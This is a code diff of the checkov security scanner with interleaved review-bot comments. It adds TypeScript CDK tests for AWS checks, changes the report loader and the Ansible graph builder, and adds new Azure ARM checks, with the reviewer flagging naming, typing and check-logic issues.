+ run_check(check_results=failed_checks, check_id="CKV_AWS_82", policy_name="AthenaWorkgroupConfiguration",
+ language="typescript")
+
+
+def test_CKV_AWS_131_AmazonMQBrokerPublicAccess(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_69", policy_name="AmazonMQBrokerPublicAccess",
+ language="typescript")
+
+
+def test_CKV_AWS_96_AuroraEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_96", policy_name="AuroraEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_166_BackupVaultEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_166", policy_name="BackupVaultEncrypted",
+ language="typescript")
+
+
+def test_CKV_AWS_174_CloudFrontTLS12(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_174", policy_name="CloudFrontTLS12", language="typescript")
+
+
+def test_CKV_AWS_36_CloudTrailLogValidation(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_36", policy_name="CloudTrailLogValidation",
+ language="typescript")
+
+
+def test_CKV_AWS_20_S3PublicACLRead(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_20", policy_name="S3PublicACLRead", language="typescript")
+
+
+def test_CKV_AWS_56_S3RestrictPublicBuckets(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_56", policy_name="S3RestrictPublicBuckets",
+ language="typescript")
+
+
+def test_CKV_AWS_149_SecretManagerSecretEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_149", policy_name="SecretManagerSecretEncrypted",
+ language="typescript")
+
+
+def test_CKV_AWS_23_SecurityGroupRuleDescription(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_23", policy_name="SecurityGroupRuleDescription",
+ language="typescript")
+
+
+def test_CKV_AWS_26_SNSTopicEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_26", policy_name="SNSTopicEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_27_SQSQueueEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_27", policy_name="SQSQueueEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_164_TransferServerIsPublic(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_164", policy_name="TransferServerIsPublic",
+ language="typescript")
+
+
+def test_CKV_AWS_123_VPCEndpointAcceptanceConfigured(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_123", policy_name="VPCEndpointAcceptanceConfigured",
+ language="typescript")
+
+
+def test_CKV_AWS_68_WAFEnabled(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_68", policy_name="WAFEnabled", language="typescript")
+
+
+def test_CKV_AWS_156_WorkspaceRootVolumeEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_156", policy_name="WorkspaceRootVolumeEncrypted",
+ language="typescript")
+
+
+def test_CKV_AWS_155_WorkspaceUserVolumeEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_155", policy_name="WorkspaceUserVolumeEncrypted",
+ language="typescript")
+
+
+def test_CKV_AWS_88_EC2PublicIP(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_88", policy_name="EC2PublicIP", language="typescript")
+
+
+def test_CKV_AWS_163_ECRImageScanning(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_163", policy_name="ECRImageScanning",
+ language="typescript")
+
+
+def test_CKV_AWS_51_ECRImmutableTags(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_51", policy_name="ECRImmutableTags", language="typescript")
+
+
+def test_CKV_AWS_136_ECRRepositoryEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_136", policy_name="ECRRepositoryEncrypted",
+ language="typescript")
+
+
+def test_CKV_AWS_65_ECSClusterContainerInsights(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_65", policy_name="ECSClusterContainerInsights",
+ language="typescript")
+
+
+def test_CKV_AWS_97_ECSTaskDefinitionEFSVolumeEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_97", policy_name="ECSTaskDefinitionEFSVolumeEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_42_EFSEncryptionEnabled(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_42", policy_name="EFSEncryptionEnabled",
+ language="typescript")
+
+
+def test_CKV_AWS_58_EKSSecretsEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_58", policy_name="EKSSecretsEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_29_ElasticacheReplicationGroupEncryptionAtRest(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_29",
+ policy_name="ElasticacheReplicationGroupEncryptionAtRest", language="typescript")
+
+
+def test_CKV_AWS_30_ElasticacheReplicationGroupEncryptionAtTransit(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_30",
+ policy_name="ElasticacheReplicationGroupEncryptionAtTransit",
+ language="typescript")
+
+
+def test_CKV_AWS_31_ElasticacheReplicationGroupEncryptionAtTransitAuthToken(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_31",
+ policy_name="ElasticacheReplicationGroupEncryptionAtTransitAuthToken",
+ language="typescript")
+
+
+def test_CKV_AWS_83_ElasticsearchDomainEnforceHTTPS(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_83", policy_name="ElasticsearchDomainEnforceHTTPS",
+ language="typescript")
+
+
+def test_CKV_AWS_84_ElasticsearchDomainLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_84", policy_name="ElasticsearchDomainLogging",
+ language="typescript")
+
+
+def test_CKV_AWS_92_ELBAccessLogs(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_92", policy_name="ELBAccessLogs", language="typescript")
+
+
+def test_CKV_AWS_91_ELBv2AccessLogs(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_91", policy_name="ELBv2AccessLogs", language="typescript")
+
+
+def test_CKV_AWS_158_CloudWatchLogGroupKMSKey(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_158", policy_name="CloudWatchLogGroupKMSKey",
+ language="typescript")
+
+
+def test_CKV_AWS_66_CloudWatchLogGroupRetention(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_66", policy_name="CloudWatchLogGroupRetention",
+ language="typescript")
+
+
+def test_CKV_AWS_34_CloudfrontDistributionEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_34", policy_name="CloudfrontDistributionEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_86_CloudfrontDistributionLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_86", policy_name="CloudfrontDistributionLogging",
+ language="typescript")
+
+
+def test_CKV_AWS_35_CloudtrailEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_35", policy_name="CloudtrailEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_67_CloudtrailMultiRegion(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_67", policy_name="CloudtrailMultiRegion",
+ language="typescript")
+
+
+def test_CKV_AWS_78_CodeBuildProjectEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_78", policy_name="CodeBuildProjectEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_47_DAXEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_47", policy_name="DAXEncryption", language="typescript")
+
+
+def test_CKV_AWS_89_DMSReplicationInstancePubliclyAccessible(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_89",
+ policy_name="DMSReplicationInstancePubliclyAccessible", language="typescript")
+
+
+def test_CKV_AWS_104_DocDBAuditLogs(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_104", policy_name="DocDBAuditLogs", language="typescript")
+
+
+def test_CKV_AWS_74_DocDBEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_74", policy_name="DocDBEncryption", language="typescript")
+
+
+def test_CKV_AWS_90_DocDBTLS(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_90", policy_name="DocDBTLS", language="typescript")
+
+
+def test_CKV_AWS_165_DynamodbGlobalTableRecovery(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_165", policy_name="DynamodbGlobalTableRecovery",
+ language="typescript")
+
+
+def test_CKV_AWS_28_DynamodbRecovery(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_28", policy_name="DynamodbRecovery", language="typescript")
+
+
+def test_CKV_AWS_3_EBSEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_3", policy_name="EBSEncryption", language="typescript")
+
+
+def test_CKV_AWS_18_S3BucketLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_18", policy_name="S3BucketLogging",
+ language="typescript")
+
+
+def test_CKV_AWS_19_S3BucketEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_19", policy_name="S3BucketEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_21_S3BucketVersioning(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_21", policy_name="S3BucketVersioning",
+ language="typescript")
+
+
+def test_CKV_AWS_145_S3BucketKMSEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_145", policy_name="S3BucketKMSEncryption",
+ language="typescript")
+
+
+def test_CKV2_AWS_6_S3BucketPublicAccessBlock(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV2_AWS_6", policy_name="S3BucketPublicAccessBlock",
+ language="typescript")
+
+
+def test_CKV_AWS_195_GlueSecurityConfigurationEnabled(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled",
+ language="typescript")
+
+
+def test_CKV_AWS_5_ElasticsearchEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_5", policy_name="ElasticsearchEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_6_ElasticsearchNodeToNodeEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_6", policy_name="ElasticsearchNodeToNodeEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_94_GlueDataCatalogEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_94", policy_name="GlueDataCatalogEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_99_GlueSecurityConfiguration(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_99", policy_name="GlueSecurityConfiguration",
+ language="typescript")
+
+
+def test_CKV_AWS_40_IAMPolicyAttachedToGroupOrRoles(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_40", policy_name="IAMPolicyAttachedToGroupOrRoles",
+ language="typescript")
+
+
+def test_CKV_AWS_43_KinesisStreamEncryptionType(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_43", policy_name="KinesisStreamEncryptionType",
+ language="typescript")
+
+
+def test_CKV_AWS_116_LambdaDLQConfigured(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_116", policy_name="LambdaDLQConfigured",
+ language="typescript")
+
+
+def test_CKV_AWS_45_LambdaEnvironmentCredentials(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_45", policy_name="LambdaEnvironmentCredentials",
+ language="typescript")
+
+
+def test_CKV_AWS_173_LambdaEnvironmentEncryptionSettings(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_173", policy_name="LambdaEnvironmentEncryptionSettings",
+ language="typescript")
+
+
+def test_CKV_AWS_115_LambdaFunctionLevelConcurrentExecutionLimit(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_115",
+ policy_name="LambdaFunctionLevelConcurrentExecutionLimit", language="typescript")
+
+
+def test_CKV_AWS_117_LambdaInVPC(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_117", policy_name="LambdaInVPC", language="typescript")
+
+
+def test_CKV_AWS_8_LaunchConfigurationEBSEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_8", policy_name="LaunchConfigurationEBSEncryption",
+ language="typescript")
+
+
+def test_CKV_AWS_44_NeptuneClusterStorageEncrypted(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_44", policy_name="NeptuneClusterStorageEncrypted",
+ language="typescript")
+
+
+# unskip after BCE-33034
+# def test_CKV_AWS_118_RDSEnhancedMonitorEnabled(failed_checks):
+# run_check(check_results=failed_checks, check_id="CKV_AWS_118", policy_name="RDSEnhancedMonitorEnabled",
+# language="typescript")
+
+
+def test_CKV_AWS_157_RDSMultiAZEnabled(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_157", policy_name="RDSMultiAZEnabled",
+ language="typescript")
+
+
+def test_CKV_AWS_17_RDSPubliclyAccessible(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_17", policy_name="RDSPubliclyAccessible",
+ language="typescript")
+
+
+def test_CKV_AWS_105_RedShiftSSL(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_105", policy_name="RedShiftSSL",
+ language="typescript")
+
+
+def test_CKV_AWS_64_RedshiftClusterEncryption(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_64", policy_name="RedshiftClusterEncryption",
+ language="typescript")
+
+
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_18_S3BucketLogging():
- run_check(lang="typescript", check_name="S3BucketLogging")
+def test_CKV_AWS_71_RedshiftClusterLogging(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_71", policy_name="RedshiftClusterLogging",
+ language="typescript")
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_19_S3BucketEncryption():
- run_check(lang="typescript", check_name="S3BucketEncryption")
+def test_CKV_AWS_87_RedshiftClusterPubliclyAccessible(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_87", policy_name="RedshiftClusterPubliclyAccessible",
+ language="typescript")
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_21_S3BucketVersioning():
- run_check(lang="typescript", check_name="S3BucketVersioning")
+def test_CKV_AWS_154_RedshiftInEc2ClassicMode(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_154", policy_name="RedshiftInEc2ClassicMode",
+ language="typescript")
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV_AWS_145_S3BucketKMSEncryption():
- run_check(lang="typescript", check_name="S3BucketKMSEncryption")
+def test_CKV_AWS_53_S3BlockPublicACLs(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_53", policy_name="S3BlockPublicACLs",
+ language="typescript")
-@pytest.mark.skip(reason="Typescript not supported yet")
-def test_CKV2_AWS_6_S3BucketPublicAccessBlock():
- run_check(lang="typescript", check_name="S3BucketPublicAccessBlock")
+def test_CKV_AWS_54_S3BlockPublicPolicy(failed_checks):
+ run_check(check_results=failed_checks, check_id="CKV_AWS_54", policy_name="S3BlockPublicPolicy",
+ language="typescript")
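Review bot: `test_CKV_AWS_131_AmazonMQBrokerPublicAccess` passes `check_id="CKV_AWS_69"`, so the test name does not match the check it exercises and reuses the `CKV_AWS_131` prefix already taken by `test_CKV_AWS_131_ALBDropHttpHeaders`; rename it `def test_CKV_AWS_69_AmazonMQBrokerPublicAccess(failed_checks):`. The module defines `LANGUAGE = 'typescript'` for the fixture but every `run_check` call repeats the literal `language="typescript"`, so the fixture and the assertions can silently drift; `language=LANGUAGE` keeps them in step. The `failed_checks` fixture is annotated `-> Dict[str, List[Dict[str, Any]]]` although it uses `yield`; `Iterator[Dict[str, List[Dict[str, Any]]]]` (or a plain `return`, since nothing runs after the yield) would be accurate.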
diff --git a/cdk_integration_tests/utils.py b/cdk_integration_tests/utils.py
index 666b7e8f121..ce76b44c669 100644
--- a/cdk_integration_tests/utils.py
+++ b/cdk_integration_tests/utils.py
@@ -3,30 +3,34 @@
 from typing import List, Dict, Any
 import yaml
+
 current_dir = os.path.dirname(os.path.realpath(__file__))
 def load_failed_checks_from_file(lang: str) -> Dict[str, List[Dict[str, Any]]]:
- report_path = os.path.join(current_dir, '..', f'checkov_report_cdk_{lang}.json')
+ report_path = os.path.join(current_dir, '..', 'checkov_report_cdk.json')
 with open(report_path) as f:
 data = f.read()
- report = json.loads(data)
- assert report is not None
- results = report.get("results", {})
- failed_checks = results.get("failed_checks")
- skipped_checks = results.get("skipped_checks")
- results = {}
- for check in failed_checks:
- check_id = check['check_id']
- if not results.get(check_id):
- results[check_id] = []
- results[check_id].append(check)
- for check in skipped_checks:
- check_id = check['check_id']
- if not results.get(check_id):
- results[check_id] = []
- results[check_id].append(check)
- return results
+ reports = json.loads(data)
+ for report in reports:
+ if report.get('check_type') == f'cdk_{lang}':
+ assert report is not None
+ results = report.get("results", {})
+ failed_checks = results.get("failed_checks")
+ skipped_checks = results.get("skipped_checks")
+ results = {}
+ for check in failed_checks:
+ check_id = check['check_id']
+ if not results.get(check_id):
+ results[check_id] = []
+ results[check_id].append(check)
+ for check in skipped_checks:
+ check_id = check['check_id']
+ if not results.get(check_id):
+ results[check_id] = []
+ results[check_id].append(check)
+ return results
+ return {}
 def is_policy_with_correct_check_id(check_id: str, language: str, policy_name: str) -> bool:
diff --git a/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml b/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml
index c79471f2dc3..bd813d8cc5f 100644
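Review bot: `failed_checks` and `skipped_checks` are read with a bare `.get()` and then iterated, so a report whose `results` lacks either key raises `TypeError` on `for check in None`; `results.get("failed_checks", [])` (and the same for `skipped_checks`) keeps the loader from crashing on a report with nothing to list. The `assert report is not None` placed after `report.get(...)` can never fire and should go. The final `return {}` silently turns a missing `cdk_{lang}` report into "no findings", which makes every test in this directory fail with the same unhelpful message; raising there, e.g. `raise AssertionError(f"no cdk_{lang} report found in {report_path}")`, points straight at the cause. The two grouping loops are identical and could be one loop over both lists into a `defaultdict(list)`.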
--- a/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml
+++ b/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml
@@ -3,10 +3,18 @@ metadata:
 name: "Ensure that HTTPS url is used with get_url"
 category: "NETWORKING"
 definition:
- cond_type: attribute
- resource_types:
- - tasks.ansible.builtin.get_url
- - tasks.get_url
- attribute: url
- operator: starting_with
- value: "https://"
+ and:
+ - cond_type: attribute
+ resource_types:
+ - tasks.ansible.builtin.get_url
+ - tasks.get_url
+ attribute: url
+ operator: not_starting_with
+ value: "http://"
+ - cond_type: attribute
+ resource_types:
+ - tasks.ansible.builtin.get_url
+ - tasks.get_url
+ attribute: url
+ operator: not_starting_with
+ value: "ftp://"
diff --git a/checkov/ansible/graph_builder/local_graph.py b/checkov/ansible/graph_builder/local_graph.py
index b9cb799c659..db6c8a64554 100644
--- a/checkov/ansible/graph_builder/local_graph.py
+++ b/checkov/ansible/graph_builder/local_graph.py
@@ -69,7 +69,7 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") ->
 # either it is actually not an Ansible file or a playbook without tasks refs
 continue
- resource_type = f"{ResourceType.TASKS}.{name}"
+ resource_type = f"{ResourceType.TASKS}.{prefix}{name}"
 if isinstance(config, str):
 # this happens when modules have no parameters and are directly used with the user input
@@ -83,6 +83,10 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") ->
 END_LINE: task[END_LINE],
 }
+ if not isinstance(config, dict):
+ # either it is actually not an Ansible file or a playbook without tasks refs
+ continue
+
 attributes = pickle_deepcopy(config)
 attributes[CustomAttributes.RESOURCE_TYPE] = resource_type
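Review bot: Replacing `starting_with "https://"` with two `not_starting_with` conditions turns an allowlist into a denylist, so a `url` such as `HTTP://…` (different case), `file://…`, a bare host with no scheme, or any other non-https value now passes a check still named "Ensure that HTTPS url is used with get_url". If the motivation is templated values like `{{ base_url }}/pkg`, an `or` of the original `starting_with: "https://"` with a `starting_with: "{{"` branch keeps the positive intent while admitting the template case. Whatever is chosen, the metadata `name` and the check docs should state what is actually enforced (not http and not ftp) so the result is not read as an HTTPS guarantee.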
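Review bot: The comment on the new `if not isinstance(config, dict)` guard is copied from the earlier `continue` ("either it is actually not an Ansible file or a playbook without tasks refs") but describes a different situation: the `isinstance(config, str)` branch above presumably normalises the bare-string case, so what is skipped here is a module whose parameters are some other non-mapping value (a list or scalar). A comment that says so, e.g. `# module parameters are neither a mapping nor a bare string (e.g. a list); nothing to build attributes from`, avoids pointing the reader at the wrong cause. `_create_tasks_vertices` starts outside the hunk.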
@@ -94,11 +98,11 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") ->
 self.vertices.append(
 Block(
 name=f"{resource_type}.{task_name}",
- config=config,
+ config=task,
 path=file_path,
 block_type=BlockType.RESOURCE,
 attributes=attributes,
- id=f"{resource_type}.{prefix}{task_name}",
+ id=f"{resource_type}.{task_name}",
 source=self.source,
 )
 )
diff --git a/checkov/ansible/runner.py b/checkov/ansible/runner.py
index f6ade71e9bb..8c0bd86c7be 100644
--- a/checkov/ansible/runner.py
+++ b/checkov/ansible/runner.py
@@ -2,6 +2,8 @@
 from typing import TYPE_CHECKING, Any
+from checkov.common.graph.checks_infra.registry import BaseRegistry
+
 from checkov.ansible.checks.registry import registry
 from checkov.ansible.graph_builder.graph_components.resource_types import ResourceType
 from checkov.ansible.graph_builder.local_graph import AnsibleLocalGraph
@@ -27,6 +29,7 @@ def __init__(
 source: str = "Ansible",
 graph_class: type[ObjectLocalGraph] = AnsibleLocalGraph,
 graph_manager: ObjectGraphManager | None = None,
+ external_registries: list[BaseRegistry] | None = None,
 ) -> None:
 super().__init__(
 db_connector=db_connector,
@@ -128,3 +131,6 @@ def build_definitions_context(
 definitions_raw: dict[str, list[tuple[int, str]]],
 ) -> dict[str, dict[str, Any]]:
 return build_definitions_context(definitions=definitions, definitions_raw=definitions_raw)
+
+ def set_definitions_raw(self, definitions_raw: dict[str, list[tuple[int, str]]]) -> None:
+ self.definitions_raw = definitions_raw
diff --git a/checkov/ansible/utils.py b/checkov/ansible/utils.py
index 2fb2696295f..a7da279a3c0 100644
--- a/checkov/ansible/utils.py
+++ b/checkov/ansible/utils.py
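Review bot: `config=task` changes what the vertex stores from the module's parameters to the whole task mapping, while `attributes` on the same `Block` is still built from `config`; any consumer reading `Block.config` for this block type now sees a different shape, and nothing in the hunk says why. A one-line comment at that argument, e.g. `# keep the whole task so the block carries name/when/loop alongside the module parameters` (or the actual reason), would document the contract change. `_create_tasks_vertices` starts outside the hunk.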
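Review bot: `external_registries` is added to `__init__`'s signature, but within the hunk it is neither forwarded to `super().__init__(...)` nor stored, so unless the call continues with it beyond the hunk a caller passing registries gets a silent no-op; `external_registries=external_registries,` in the super call (if the base accepts it) or `self.external_registries = external_registries` makes the parameter effective. The `super().__init__` call continues outside the hunk, so this is an inference to confirm. The new `BaseRegistry` import also sits in its own group between `typing` and the `checkov.ansible` imports; it belongs with the other `checkov.common` imports.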
@@ -1,16 +1,20 @@
 from __future__ import annotations
 import logging
+import os
 import re
 from pathlib import Path
-from typing import Any
+from typing import Any, List
 from checkov.ansible.graph_builder.graph_components.resource_types import ResourceType
+from checkov.common.parallelizer.parallel_runner import parallel_runner
 from checkov.common.parsers.yaml.parser import parse
 from checkov.common.resource_code_logger_filter import add_resource_code_filter_to_logger
+from checkov.common.runners.base_runner import filter_ignored_paths
 from checkov.common.util.consts import START_LINE, END_LINE
 from checkov.common.util.file_utils import read_file_with_any_encoding
 from checkov.common.util.suppression import collect_suppressions_for_context
+from checkov.runner_filter import RunnerFilter
 TASK_NAME_PATTERN = re.compile(r"^\s*-\s+name:\s+", re.MULTILINE)
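Review bot: `List` is added to the `typing` import although the module has `from __future__ import annotations` and uses builtin generics (`list[...]`, `dict[...]`) everywhere else; its only use is the `List[str]` parameter of `create_file_definition` later in this file, which should read `list[str]` so the import can stay `from typing import Any`. `RunnerFilter` is now imported from `checkov.runner_filter` into a low-level utils module; if that module (directly or via `checkov.common.runners.base_runner`) imports anything from the ansible package this becomes an import cycle — worth a quick check, and since `create_definitions` instantiates `RunnerFilter()` at runtime a `TYPE_CHECKING` guard alone would not do, a function-local import would.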
@@ -189,3 +193,36 @@ def _create_resource_context(definition_raw: list[tuple[int, str]], resource: di
 "code_lines": code_lines,
 "skipped_checks": skipped_checks,
 }
+
+
+def create_definitions(
+ root_folder: str | None,
+ files: list[str] | None = None,
+ runner_filter: RunnerFilter | None = None
+) -> tuple[dict[str, dict[str, Any]], dict[str, list[tuple[int, str]]]]:
+ runner_filter = runner_filter or RunnerFilter()
+ definitions: dict[str, dict[str, Any]] = {}
+ definitions_raw: dict[str, list[tuple[int, str]]] = {}
+ if files:
+ create_file_definition(files, definitions, definitions_raw)
+
+ if root_folder:
+ for root, d_names, f_names in os.walk(root_folder):
+ filter_ignored_paths(root, d_names, runner_filter.excluded_paths)
+ filter_ignored_paths(root, f_names, runner_filter.excluded_paths)
+ files_to_load = [os.path.join(root, f_name) for f_name in f_names]
+ create_file_definition(files_to_load, definitions, definitions_raw)
+
+ return definitions, definitions_raw
+
+
+def create_file_definition(files_to_load: List[str], definitions: dict[str, dict[str, Any]], definitions_raw: dict[str, list[tuple[int, str]]]) -> None:
+ results = parallel_runner.run_function(lambda f: (f, parse_file(f)), files_to_load)
+ for file_result_pair in results:
+ if file_result_pair is None:
+ # this only happens, when an uncaught exception occurs
+ continue
+
+ file, result = file_result_pair
+ if result:
+ (definitions[file], definitions_raw[file]) = result # type: ignore[assignment]
diff --git a/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml
new file mode 100644
index 00000000000..cfaaf45376c
--- /dev/null
+++ b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml
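Review bot: `create_definitions` hands every file under `root_folder` to `create_file_definition`, relying on `parse_file` to reject non-YAML content; if `parse_file` does not short-circuit on extension, that is one parse attempt per file in the tree (including large non-Ansible files), so a `.yml`/`.yaml` suffix filter when building `files_to_load` keeps the walk cheap. `create_file_definition` has a 150+ character signature and mixes `List[str]` with the `list[...]`/`dict[...]` generics on the same line; `files_to_load: list[str]` with a wrapped signature matches the rest of the module. Neither function has a docstring; a one-liner on `create_definitions` stating that `files` and `root_folder` are both processed when both are given and that the returned dicts are keyed by file path would save the next reader a trip into `parse_file`.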
@@ -0,0 +1,15 @@
+metadata:
+ id: "CKV2_AZURE_49"
+ name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access"
+ category: "NETWORKING"
+definition:
+ or:
+ - cond_type: "attribute"
+ resource_types: "Microsoft.MachineLearningServices/workspaces"
+ attribute: "properties.publicNetworkAccess"
+ operator: "not_exists"
+ - cond_type: "attribute"
+ resource_types: "Microsoft.MachineLearningServices/workspaces"
+ attribute: "properties.publicNetworkAccess"
+ operator: "equals"
+ value: "Disabled"
\ No newline at end of file
diff --git a/checkov/arm/checks/resource/ACRAdminAccountDisabled.py b/checkov/arm/checks/resource/ACRAdminAccountDisabled.py
new file mode 100644
index 00000000000..1235c707553
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRAdminAccountDisabled.py
@@ -0,0 +1,22 @@
+from __future__ import annotations
+from typing import Any, List
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class ACRAdminAccountDisabled(BaseResourceNegativeValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure ACR admin account is disabled"
+ id = "CKV_AZURE_137"
+ supported_resources = ("Microsoft.ContainerRegistry/registries",)
+ categories = [CheckCategories.IAM]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/adminUserEnabled"
+
+ def get_forbidden_values(self) -> List[Any]:
+ return [True]
+
+
+check = ACRAdminAccountDisabled()
diff --git a/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py b/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py
new file mode 100644
index 00000000000..812a084160c
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py
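Review bot: The `not_exists` branch makes a workspace that omits `properties.publicNetworkAccess` pass, yet the check exists to catch permissive network access, and for this resource the service default when the property is absent is public access enabled (to my recollection — confirm against the current ARM reference); if so, the `or` should drop the `not_exists` arm and keep only `equals: "Disabled"`, otherwise the check passes exactly the templates it was written to flag. The file also lacks a trailing newline.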
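Review bot: `categories` is a list here while the sibling ARM checks added in this commit (`ACRAnonymousPullDisabled`, `ACRContainerScanEnabled`, `AKSLocalAdminDisabled`, …) use tuples, and `List[Any]` is used although `from __future__ import annotations` is in effect and `AKSPoolTypeIsScaleSet` in the same commit writes `list[Any]` for the same method; `categories = (CheckCategories.IAM,)` and `-> list[Any]` keep the new files uniform. The same list-vs-tuple mismatch is in `ACRPublicNetworkAccessDisabled` further down.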
@@ -0,0 +1,38 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class ACRAnonymousPullDisabled(BaseResourceCheck):
+ ANONYMOUS_PULL_SKUS = {"Standard", "Premium"} # noqa: CCE003 # a static attribute
+
+ def __init__(self) -> None:
